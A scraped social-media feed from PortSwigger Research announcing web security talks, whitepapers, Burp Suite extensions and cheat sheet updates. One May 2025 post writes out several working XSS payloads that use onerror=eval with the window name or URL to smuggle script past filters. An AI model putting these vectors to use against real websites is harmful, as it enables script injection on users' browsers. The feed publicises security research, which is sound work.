PortSwigger Research's Avatar

PortSwigger Research

@portswiggerres

Web security research from the team at PortSwigger.

2,761
Followers
8
Following
4
Posts
11.08.2023
Joined
Posts Following

Latest posts by PortSwigger Research @portswiggerres

Post image

Love web & AI security research? Want to do it full time on-site with myself, Gareth Heyes & Zak Fedotkin? Join the PortSwigger Research team - we're hiring!

apply.workable.com/portswigger/...

23.01.2026 10:36 πŸ‘ 8 πŸ” 8 πŸ’¬ 0 πŸ“Œ 0
Post image

We've updated our XSS cheat sheet to include 9 new vectors from @garethheyes.co.uk! Here are the top three, you can find the rest here: portswigger.net/web-security...

10.11.2025 14:49 πŸ‘ 175 πŸ” 20 πŸ’¬ 3 πŸ“Œ 0
RomHack 2025 - James β€œalbinowax” Kettle - HTTP/1.1 Must Die! The Desync Endgame
RomHack 2025 - James β€œalbinowax” Kettle - HTTP/1.1 Must Die! The Desync Endgame YouTube video by Cyber Saiyan

The recording of "HTTP/1.1 must die: the desync endgame" has now landed on YouTube. Enjoy! www.youtube.com/watch?v=zr5y...

08.10.2025 14:16 πŸ‘ 15 πŸ” 3 πŸ’¬ 1 πŸ“Œ 0
Post image

I’m excited to announce that I’ll be presenting The Fragile Lock: Novel Bypasses for SAML Authentication at Black Hat Europe! In this talk, I’ll show how I was able to continuously bypass security patches to achieve complete auth bypass for major libraries. #BHEU @blackhatevents.bsky.social

07.10.2025 14:55 πŸ‘ 26 πŸ” 6 πŸ’¬ 0 πŸ“Œ 0
RomHack Conference 2025 Live Stream
RomHack Conference 2025 Live Stream YouTube video by Cyber Saiyan

HTTP/1.1 Must Die is coming to #romhack2025 as the keynote! In-person tickets are sold out but you can still watch the livestream. This is your last chance to catch it live - register to watch here:
www.youtube.com/watch?v=T009...

18.09.2025 13:40 πŸ‘ 9 πŸ” 4 πŸ’¬ 0 πŸ“Œ 0
Post image

I just published a Repeater feature to make it easier to explore request smuggling. It repeats your request until the status code changes. It's called "Retry until success" and you can install it via the Extensibility helper bapp.

20.08.2025 15:02 πŸ‘ 14 πŸ” 5 πŸ’¬ 1 πŸ“Œ 0
Post image

Watch HTTP/1.1 Must Die live today at 1630 PST!
- In person at #defcon33 track 1, main stage
- Livestream via YouTube: www.youtube.com/watch?v=ssln...

08.08.2025 18:46 πŸ‘ 7 πŸ” 2 πŸ’¬ 2 πŸ“Œ 0
Preview
HTTP/1.1 Must Die Upstream HTTP/1.1 is inherently insecure, and routinely exposes millions of websites to hostile takeover. Join the mission to kill HTTP/1.1 now

The whitepaper is live! Learn how to win the HTTP desync endgame... and why HTTP/1.1 needs to die: http1mustdie.com

06.08.2025 23:43 πŸ‘ 40 πŸ” 22 πŸ’¬ 0 πŸ“Œ 2

It's easy to bash vulnerabilities with logos but... I couldn't resist, say hello to http1mustdie.com :)

18.07.2025 12:56 πŸ‘ 13 πŸ” 3 πŸ’¬ 2 πŸ“Œ 0
Post image

I'm thrilled to announce "HTTP/1 Must Die! The Desync Endgame" is coming to #DEFCON33! This talk will feature multiple new classes of desync attack, mass exploitation spanning multiple CDNs, and over $200k in bug bounties. See you there!

10.06.2025 14:20 πŸ‘ 43 πŸ” 11 πŸ’¬ 0 πŸ“Œ 1
The Single-Packet Shovel: Digging for Desync-Powered Request Tunnelling In this paper I will reveal the discovery of wide-spread cases of request tunnelling in applications powered by popular servers including IIS, Azure Front Door and AWS' application load balancer inclu...

Thrilled to finally release my latest research "The Single-Packet Shovel: Digging for Desync-Powered Request Tunnelling".

Desync vulnerabilities stemming from HP2 downgrading continue to plague even the largest vendors, have a read to find out how!

22.05.2025 16:03 πŸ‘ 16 πŸ” 4 πŸ’¬ 1 πŸ“Œ 0
AMA: James Kettle on Burp Suite, AI & Security Research
AMA: James Kettle on Burp Suite, AI & Security Research YouTube video by PortSwigger

The recording of my recent AMA with the Burp Suite Discord community has just landed on YouTube! 40 minutes of unscripted Q&A on security research, AI, and Burp Suite: youtu.be/mgmUZ9odkvU

27.05.2025 12:29 πŸ‘ 18 πŸ” 7 πŸ’¬ 0 πŸ“Œ 1
<script>throw onerror=eval,{
   lineNumber:1,columnNumber:1,fileName:1,message:name
}</script>
<svg onload="throw top.onerror=eval,{
   lineNumber:1,columnNumber:1,fileName:1,message:'/*'+URL
}">

<script>throw onerror=eval,{ lineNumber:1,columnNumber:1,fileName:1,message:name }</script> <svg onload="throw top.onerror=eval,{ lineNumber:1,columnNumber:1,fileName:1,message:'/*'+URL }">

<body onload="throw onerror=eval,{lineNumber:1,columnNumber:1,fileName:1,message:'/*'+location}">
<script>throw lineNumber=columnNumber=fileName=message=name,onerror=eval,{lineNumber,columnNumber,fileName,message}</script>

<body onload="throw onerror=eval,{lineNumber:1,columnNumber:1,fileName:1,message:'/*'+location}"> <script>throw lineNumber=columnNumber=fileName=message=name,onerror=eval,{lineNumber,columnNumber,fileName,message}</script>

Firefox now opens the door to URL-based XSS payload smuggling too. Yep, even more ways to sneak past filters using the window name and clever URL tricks. Link to vectorsπŸ‘‡

portswigger.net/web-security...

27.05.2025 13:55 πŸ‘ 10 πŸ” 3 πŸ’¬ 0 πŸ“Œ 0
Preview
RomHack Conference, Training and Camp RomHack is a format made by the non-profit association Cyber Saiyan and composed by a Conference a Training session and a Hacker Camp.

I'm excited to announce I'll be delivering the keynote at RomHack this September! I can't share the title just yet but it's going to be a good one. See you in Rome!
romhack.io

17.03.2025 12:38 πŸ‘ 19 πŸ” 2 πŸ’¬ 0 πŸ“Œ 1

I’m excited to introduce Namespace Confusion, a novel attack discovered during Gareth's and mySAML Roulette: The Hacker Always Wins research. We uncovered a brutal attack on XML signature validation that destroys authentication in Ruby-SAML!

18.03.2025 15:01 πŸ‘ 23 πŸ” 6 πŸ’¬ 0 πŸ“Œ 0
Preview
SAML roulette: the hacker always wins Introduction In this post, we’ll show precisely how to chain round-trip attacks and namespace confusion to achieve unauthenticated admin access on GitLab Enterprise by exploiting the ruby-saml library

You might have noticed that the recent SAML writeups omit some crucial details. In "SAML roulette: the hacker always wins", we share everything you need to know for a complete unauthenticated exploit on ruby-saml, using GitLab as a case-study.

portswigger.net/research/sam...

18.03.2025 14:57 πŸ‘ 53 πŸ” 23 πŸ’¬ 0 πŸ“Œ 4
Video thumbnail

We've just released Shadow Repeater, for AI-enhanced manual testing. Simply use Burp Repeater as you normally would, and behind the scenes Shadow Repeater will learn from your attacks, try payload permutations, and report any discoveries via Organizer.

portswigger.net/research/sha...

20.02.2025 13:24 πŸ‘ 21 πŸ” 12 πŸ’¬ 2 πŸ“Œ 3
Top 10 Web Hacking Techniques of 2024 - James Kettle - ASW #318
Top 10 Web Hacking Techniques of 2024 - James Kettle - ASW #318 YouTube video by Security Weekly - A CRA Resource

@jameskettle.com casually dropping info on the craziest sounding AI-enabled burp extension. Can you imagine messing about with a suspicious LFI candidate in repeater and without you doing anything differently than you do today, burp suddenly spits back the right payload?

18.02.2025 15:37 πŸ‘ 6 πŸ” 5 πŸ’¬ 1 πŸ“Œ 0
Post image

We've updated our URL validation bypass cheat sheet with this shiny Domain allow list bypass payload contributed by dyak0xdb!

06.02.2025 09:17 πŸ‘ 28 πŸ” 9 πŸ’¬ 1 πŸ“Œ 0
Preview
Top 10 web hacking techniques of 2024 Welcome to the Top 10 Web Hacking Techniques of 2024, the 18th edition of our annual community-powered effort to identify the most innovative must-read web security research published in the last year

The results are in! We're proud to announce the Top 10 Web Hacking Techniques of 2024! portswigger.net/research/top...

04.02.2025 15:02 πŸ‘ 66 πŸ” 36 πŸ’¬ 2 πŸ“Œ 5

I'm super proud to announce my weekend project and latest #burpsuite extension written in Kotlin! πŸ‘Ύ I love hacking, finding problems or challenges during and the ability to fix them whilst improving my code-foo.

Introducing πŸ—’οΈ StickyBurp! πŸ—’οΈ -> github.com/GangGreenTem...

@portswiggerres.bsky.social

23.12.2024 21:05 πŸ‘ 9 πŸ” 3 πŸ’¬ 0 πŸ“Œ 1
Preview
Top ten web hacking techniques of 2024: nominations open Nominations are now open for the top 10 new web hacking techniques of 2024! Every year, security researchers from all over the world share their latest findings via blog posts, presentations, PoCs, an

Nominations are now open for the Top 10 Web Hacking Techniques of 2024! Browse the contestants and submit your own here:
portswigger.net/research/top...

08.01.2025 14:09 πŸ‘ 28 πŸ” 19 πŸ’¬ 1 πŸ“Œ 4
Preview
Bypassing WAFs with the phantom $Version cookie HTTP cookies often control critical website features, but their long and convoluted history exposes them to parser discrepancy vulnerabilities. In this post, I'll explore some dangerous, lesser-known

Did you know you can use an ancient magic cookie to downgrade parsers and bypass WAFs?! Hope you enjoy this quality bit of RFC-diving from @d4d89704243.bsky.social!
portswigger.net/research/byp...

04.12.2024 15:17 πŸ‘ 73 πŸ” 27 πŸ’¬ 1 πŸ“Œ 5
YouTube
YouTube Share your videos with friends, family, and the world

We’re finally live! You can now watch β€œListen to the whispers: web timing attacks that actually work” on YouTube: youtube.com/watch?v=zOPj...

17.11.2024 11:17 πŸ‘ 35 πŸ” 9 πŸ’¬ 0 πŸ“Œ 2
DEF CON 32 - Splitting the email atom  exploiting parsers to bypass access controls - Gareth Heyes
DEF CON 32 - Splitting the email atom exploiting parsers to bypass access controls - Gareth Heyes YouTube video by DEFCONConference

In case you missed it...the DEF CON video of my talk 'Splitting the Email Atom' is finally here! πŸš€ Watch me demonstrate how to turn an email address into RCE on Joomla, bypass Zero Trust defences, and exploit parser discrepancies for misrouted emails. Don’t miss it:

youtu.be/JERBqoTllaE?...

22.11.2024 07:27 πŸ‘ 95 πŸ” 30 πŸ’¬ 2 πŸ“Œ 0
DEF CON 32 - Gotta Cache β€˜em all  bending the rules of web cache exploitation - Martin Doyhenard
DEF CON 32 - Gotta Cache β€˜em all bending the rules of web cache exploitation - Martin Doyhenard YouTube video by DEFCONConference

If you like bounties, I highly recommend this presentation from Martin Doyhenard on novel web cache deception techniques. It comes with Web Security Academy labs too!
www.youtube.com/watch?v=70yy...

26.11.2024 14:33 πŸ‘ 62 πŸ” 16 πŸ’¬ 3 πŸ“Œ 0

Hello world

11.08.2023 21:36 πŸ‘ 11 πŸ” 1 πŸ’¬ 0 πŸ“Œ 0